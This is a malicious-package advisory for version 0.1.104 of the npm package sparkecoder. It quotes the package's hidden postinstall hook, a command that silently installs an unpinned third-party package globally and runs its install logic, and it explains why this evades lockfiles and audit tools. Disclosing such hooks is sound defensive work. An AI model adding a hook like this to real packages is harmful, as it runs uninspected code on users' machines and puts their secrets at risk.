npm · Malicious package advisory
Malwaresparkecoder
MAL-2026-4673
Malicious code in sparkecoder (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (d4e17b053b29d371301e49a703b1b6d2fba5631df4bf7b6926503a6b8bb82257) package.json declares a postinstall hook: "npm install -g agent-browser 2>/dev/null || true; agent-browser install 2>/dev/null || true". On `npm install sparkecoder`, this fetches whatever the current 'latest' version of the separate `agent-browser` package is on the npm registry, installs it globally (typically requiring elevated privileges), then invokes `agent-browser install` to run that package's own install-time logic. Both stderr and non-zero exit codes are suppressed (`2>/dev/null || true`), hiding any failure or output from the installer. The behavior is undocumented in the README. Because the dependency is unpinned and pulled transitively through a side channel (not via package.json `dependencies`), the installer's trust in sparkecoder is silently extended to whatever agent-browser ships today and at any future moment, with no version lock and no audit trail in the dependency tree. This is the namespace-abuse shape: sparkecoder itself is small, but installing it causes attacker- or third-party-controlled code from another package to execute on the installer's machine at install time, outside the normal dependency-resolution surface that lockfiles and audit tools inspect.
Compromised versions (1)
- 0.1.104
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.